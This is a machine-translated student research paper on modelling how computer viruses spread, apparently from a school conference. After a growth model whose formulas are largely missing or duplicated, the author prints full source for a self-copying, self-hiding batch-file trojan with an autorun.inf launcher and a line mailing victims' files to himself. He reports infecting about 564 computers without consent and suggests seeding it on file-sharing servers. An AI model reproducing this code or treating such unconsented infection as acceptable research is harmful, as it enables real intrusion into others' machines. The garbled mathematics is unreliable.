<
  • Главная
Статьи

"ІТЗ-Томськ-2010" - Луценко І.І. - ДОСЛІДЖЕННЯ МОДЕЛІ ПОШИРЕННЯ КОМП'ЮТЕРНИХ ВІРУСІВ

ДОСЛІДЖЕННЯ МОДЕЛІ ПОШИРЕННЯ КОМП'ЮТЕРНИХ ВІРУСІВ

Луценко Іван Іванович

МОУ гімназія № 9, м Кузнецьк, Пензенська область

задати питання автору

Навчаючись в Освітньому центрі, учні отримують настільки високий рівень підготовки, що виявляються в змозі проводити дослідницьку роботу на досить високому для їх віку рівні. Дана робота виконана учнем 9 класу, які навчаються за індивідуальною програмою в ІТ-класі. Вона містить дослідження моделі поширення комп'ютерного вірусу в мережі Інтернет. Автор крім дослідження моделі створив комп'ютерний вірус, вивчив механізм його поширення і зробив власні, досить несподівані, висновки.

Науковий керівник: Бессонова Тетяна Миколаївна

Для багатьох вчителів дуже гостро постає проблема підготовки дитини до науково-дослідницької діяльності. З усіх труднощів, з якими стикається вчитель при організації такого виду роботи, мені б хотілося зупинитися на відсутності методичних матеріалів для організації дослідження. Саме тут і приходять на допомогу співробітники ОЦ «Шкільний університет». Методичні посібники, розроблені освітнім центром, надають неоціненну допомогу вчителю в підготовці дитини до створення роботи дослідницького характеру. У них містяться і напрямки дослідження, і джерела, до яких можна звернутися.

Робота, яка надається вашій увазі, виконана учнем 9 класу. Виконана вона за допомогою методичних матеріалів навчального центру.

Без сумніву, комп'ютерні технології щільно увійшли в наше повсякденне життя. Комп'ютери використовуються практично у всіх сферах життя людського суспільства: від шкільних кабінетів інформатики до комп'ютерних систем охорони державної безпеки.

Вірусні атаки на комп'ютери з кожним роком набирають обертів. Кількість створених комп'ютерних вірусів зростає катастрофічними темпами. За прогнозом керівника антивірусної лабораторії компанії «Лабораторія Касперського» Станіслава Шевченка в 2009 році очікувався приріст обсягів шкідливого коду 1 терабайт (1024 гігабайти) щомісяця. Стає найбільш актуальною тема захисту комп'ютерів, розробки антивірусних проектів. В наш час інформація, необхідна для створення шкідливих програм легкодоступна у Всесвітній мережі, і будь-хто може скористатися їй. Саме через доступність подібних навчальних статей виникає проблема створення вірусів студентами та школярами. Кевін Митник, Стівен Сильверман, Свен Яшан, і багато, багато інших, чиї імена увійшли в історію вірусописання і чиї діяння доставили безліч бід звичайним користувачам, завдали фінансові втрати багатьом компаніям. Мабуть невипадково існує програма Microsoft Antivirus Award, в якій створено фонд в $ 5 млн., Призначений для нагородження людей, які надали інформацію про розповсюджувачів комп'ютерних вірусів. Microsoft запропонувала три нагороди за $ 250 тис. За відомості про відповідальних за віруси MSBlast, Sobig і MyDoom.

Але може бути, розмови про серйозну небезпеку, що виходить від юних творців вірусів, це просто рекламний трюк для більш активного продажу антивірусних програм? І проблема не так вже й серйозна? Я вирішив це питання вивчити більш детально і спробувати свої сили в створенні подібної програми - вірусу Win32_ systemVV.

Мета моєї роботи - вивчення механізму поширення комп'ютерних вірусів.

Гіпотеза: «Чи може вірус, створений звичайним школярем, стати серйозною перешкодою для роботи користувача?»

Для відповіді на поставлені мною питання, я вирішив досліджувати матеріали літератури і публікації Інтернеті. В основному, автори вивчених мною публікацій, проводять аналогію комп'ютерного вірусу з біологічним. І це обгрунтовано, так як в моделі розповсюдження того чи іншого є ряд подібних ознак. Можна виділити наступні: алгоритм зараження об'єкта, принцип руйнування об'єкта і вплив вірусу на організм, або об'єкт; механізм захисту об'єкта від вірусу. З математичної точки зору і комп'ютерні, і біологічні віруси мають подібні числові параметри, один з них - середня плодючість в одиницю часу, тобто швидкість виробництва вірусом своїх копій. Важливий параметр - це наскільки непомітний вірус в клітці, знищує він клітку або спокійно і щодо нешкідливо в ній існує. Інші параметри так само мають подібне значення. Наприклад, відсоток заражених клітин, з усіх доступних для зараження, відповідає частці уражених комп'ютерів серед всіх систем з вразливою для даного вірусу операційною системою. Аналогічно: концентрація вірусів в крові, що в певному сенсі відповідає концентрації вірусів у пересилаються по Інтернету в електронних повідомленнях. Кількість антитіл у кровоносній системі тоді співвідноситься з кількістю поштових серверів, які встановили противірусний фільтр. Таким чином, схожі процеси поширення комп'ютерних вірусів в мережі Інтернету і розвиток біологічних вірусів в людському організмі можна описати подібними математичними рівняннями.

Так як процеси поширення комп'ютерного та біологічного вірусів описуються подібними математичними рівняннями, поширення комп'ютерних вірусів ILOVEYOU, Win32.HLLW, Spyware, і їм подібних, можна розглянути за допомогою однієї з базових біологічних моделей - моделей необмеженого зростання.

В основі цієї моделі лежить припущення, що коефіцієнт виробництва вірусом цих копій (коефіцієнт зростання, коефіцієнт поширення) пропорційний числу вірусів. Побудова загальної математичної моделіначнём, моделюючи процес поширення комп'ютерного вірусу в мережі Інтернету в «чистому вигляді», без обмежувальних чинників.

Нехай початкова чисельність «популяції заражених комп'ютерів» дорівнює Нехай початкова чисельність «популяції заражених комп'ютерів» дорівнює .

Припустимо, що чисельність популяцій залежить тільки від зростання популяцій. Позначимо коефіцієнт зростання - R.

R показує, у скільки разів збільшилася чисельність популяції за певний проміжок часу.

Отже, якщо в початковий момент часу початкова чисельність популяції була Отже, якщо в початковий момент часу початкова чисельність популяції була   , То в наступний (перший) момент часу чисельність популяції буде дорівнює: , То в наступний (перший) момент часу чисельність популяції буде дорівнює:

У другій момент часу чисельність популяції знову збільшується в R разів і дорівнюватиме:

Чисельність популяції в Чисельність популяції в   - й момент часу буде дорівнює: - й момент часу буде дорівнює:

(1) (1)

де:

- чисельність популяції в i- й і   моменти часу;  R - коефіцієнт зростання популяції - чисельність популяції в i- й і моменти часу; R - коефіцієнт зростання популяції.

Ми розглядаємо зміна чисельності популяції протягом якогось часу. Припустимо, що загальний час зростання нашої популяції одно T, а період росту популяції (той проміжок часу, за який чисельність популяції збільшується в R разів: крок, з яким досліджується процес) дорівнює Ми розглядаємо зміна чисельності популяції протягом якогось часу . Зауважимо, що для різних біологічних видів період має різну протяжність.

Тоді можна порахувати, скільки періодів (N) ми досліджуємо.

(2) (2)

Тобто, у формулі (1) індекс i змінюється від 0 до N, де N - кількість тимчасових інтервалів (моментів часу).

Таким чином, формули (1-2) описують математичну модель необмеженого поширення комп'ютерного вірусу в мережі Інтернету.

Параметрами моделі є:

Побудована модель дозволяє досліджувати динаміку чисельності «популяції заражених комп'ютерів», т. Е. Поширення комп'ютерних вірусів в мережі Інтернету.

Математична модель має вигляд:

Математична модель має вигляд:

Побудувавши лінію тренда поширення комп'ютерних вірусів, ми отримуємо один з п'яти типів лінії тренда - поліноміальний, т. К. Математичну модель можна описати рівнянням Побудувавши лінію тренда поширення комп'ютерних вірусів, ми отримуємо один з п'яти типів лінії тренда - поліноміальний, т

Спираючись на вивчений матеріал, на аналіз поширення і роботи вірусів, я вирішив написати власний «вірус» (програму - Троян), що змінює деякі налаштування ОС (дата, час), не більше.

Вивчивши в Інтернеті матеріал по створенню найпростіших шкідливих програм, (який, між іншим, знаходиться у вільному доступі), я створив програму, яка змінює час і дату на комп'ютері «жертви» на 21 грудня 2012 року і копіює себе на флеш носій (якщо той підключений) і на жорсткий диск. Після чого робиться невидимим. Тіло вірусу виглядає так:

@echo off

md D: \ VVsystem

copy% 0 D: \ VVsystem \ Win32_systemVV.bat

attrib D: \ VVsystem \ Win32_systemVV.bat + h + s + a + r

time 3:00

date 21.12.2012

label C: Hacked

label D: Hacked

label H: Hacked

md H: \ VVsystem

copy% 0 H: \ VVsystem \ Win32_systemVV.bat

attrib H: \ VVsystem \ Win32_systemVV.bat + h + s + a + r

pause

cls

Вірус можна модифікувати, щоб він мав можливість запускатися при завантаженні Windows, але так як це всього лише тестова шкідлива програма, залишимо код колишнім. Але для того, щоб вірус став повноцінним, необхідно додати код, що дозволяє програмі копіюватися зі знімних носіїв на комп'ютер, до якого ці носії підключені. Команда Echo run = H: \ VVsystem \ Win32_systemVV.bat >> autorun.inf додає в тіло Автозавантажувач autorun.inf код, який запускає наш вірус «Win32_systemVV.bat» при відкритті знімного носія.

Тепер, коли вірус - Троян готовий, можна безперешкодно запускати його на файлообмінні сервери, разом з цікавими, що привертають увагу файлами. При їх відкритті вірус почне свою роботу, залишаючись невидимим для жертви.

Найцікавіше, що подібні * .bat віруси не виявляються антивірусними програмами, так як всього лише виконують команда самої ОС, що, на думку «сторожів», ніяк не може нашкодити комп'ютеру.

Щоб довести гіпотезу про загрозу шкідливих програм, написаних школярами, необхідно було написаний мною вірус запустити «в оборот»

Через електронну пошту і flash-носії я почав поширення мого вірусу.

Додавши в тіло програми рядки

find% windir% \ sistem32 \ regedt32.exe

if exist% windir% \ sistem32 \ regedt32.exe copy% windir% \ sistem32 \ regedt32.exe

D: \ VVsystem \

send D: \ VVsystem \ regedt32.exe [email protected] > Nul,

я відсилав дані реєстру комп'ютера жертви на свою електронну адресу, після чого можна було судити, скільки комп'ютерів було заражено моїм вірусом за певний проміжок часу.

За один день вірусом Win32_systemVV заразилося приблизно 30 призначених для користувача машин. З огляду на моє спілкування з друзями і їх бажання включитися в експеримент, я отримав, що через місяць випробувань вірусом заразилися 564 комп'ютера. Але, незважаючи на всі мої старання і вміння, витрачені на вдосконалення вірусу, я не зміг перевищити цю межу кількості заражених комп'ютерів. Мій * .bat - вірус занадто банальний, для того щоб здійснювати масові атаки, провокувати епідемії. Навіть, незважаючи на те, що шкідливу програму не виявляється антивіруси, вона не може дати стовідсоткову гарантію зараження, так як неможливо передбачити всі варіанти модифікації системи і викрадення даних не завжди спрацьовує.

ВИСНОВОК. Таким чином, напрошується висновок, що непрофесійні користувачі комп'ютерів НЕ МОЖУТЬ створити такий вірус, щоб він спровокував масову атаку. По-справжньому небезпечні віруси вимагають величезних знань, які юні користувачі комп'ютерів отримати не зможуть. В Інтернеті зустрічається багато статей, присвячених вірусописання, але більшість цих статей писали такі ж недосвідчені хакери, які вивчили тільки ази програмування. Для написання гарної шкідливої ​​програми потрібен досвід, і тільки досвід. І, тим не менш, шкода від вірусів дуже великий. І мені здається, що можна направити ситуацію на користь суспільству, організувавши фонд, винагороджує програмістів, які добровільно «здали» свій вірус в базу даних компаній, що займаються створенням антивірусних програм, або знайти для них можливість для безкоштовного користування мережею Інтернет на якийсь проміжок часу. З одного боку, ця пропозиція може здатися абсурдним, але якщо подивитися на дану проблему під іншим кутом, може бути і варто задуматися. Колишні заходи боротьби з хакерами дають незначні результати. Шкода від вірусописання настільки великий, що за кордоном уже вирішили залучити хакерів на користь суспільству. Відомо, що Міністерство Національної Безпеки США (Department of Homeland Security) готове прийняти на роботу хакерів, які бажають перейти по іншу сторону барикад і встати на захист національної Інтернет-інфраструктури. В оголошенні, опублікованому компанією General Dynamics Information Technology за дорученням DHS, перераховані основні вимоги, що висуваються до кандидатів. Роботодавець робить особливий акцент на тому, що претенденти повинні розуміти образ думок «поганих хлопців» і продемонструвати високий рівень володіння хакерськими методиками та інструментами. В обов'язки прийнятих на службу фахівців буде входити ретельний аналіз мережевого трафіку і виявлення вразливостей в федеральних ІТ-системах. Можливо, такий заклик незабаром прозвучить і в нашій країні. Прийом, пропонований мною, дозволить легалізувати вірусів і зареєструвати їх в спеціальній базі даних. А особливо «талановитих» можна буде в майбутньому залучати до роботи із захисту Російської інтернет-інфраструктури.

література

  1. Інформатика. Задачник по моделюванню. 7-9 клас. Базовий курс / За редакцією проф. Н. В. Макарової. - СПБ: Питер, 2003.
  2. Угриновича Н. Д. Дослідження інформаційних моделей. Елективний курс: Учеб. Посібник. - М: БІНОМ, 2004.
  3. Круподерова Е. П. Практикум з курсу «Інформаційні технології в освіті». - Мурманськ, 2003.
  4. Смірняев А. В. Моделювання від біології до економіки: Учеб. Посібник. / А. В. Ісачкін, Л. К. Харрасова. - М: Видавництво МСХА, 2002.
  5. Миньков С. Л Excel. Лабораторний практикум. - Томськ: Томський міжвузівський центр дистанційної освіти, 2000..

Але може бути, розмови про серйозну небезпеку, що виходить від юних творців вірусів, це просто рекламний трюк для більш активного продажу антивірусних програм?
І проблема не так вже й серйозна?


Новости
  • Виртуальный хостинг

    Виртуальный хостинг. Возможности сервера распределяются в равной мере между всеми... 
    Читать полностью

  • Редизайн сайта

    Редизайн сайта – это полное либо частичное обновление дизайна существующего сайта.... 
    Читать полностью

  • Консалтинг, услуги контент-менеджера

    Сопровождение любых интернет ресурсов;- Знание HTML и CSS- Поиск и обновление контента;-... 
    Читать полностью

  • Трафик из соцсетей

    Сравнительно дешевый способ по сравнению с поисковым и контекстным видами раскрутки... 
    Читать полностью

  • Поисковая оптимизация

    Поисковая оптимизация (англ. search engine optimization, SEO) — поднятие позиций сайта в результатах... 
    Читать полностью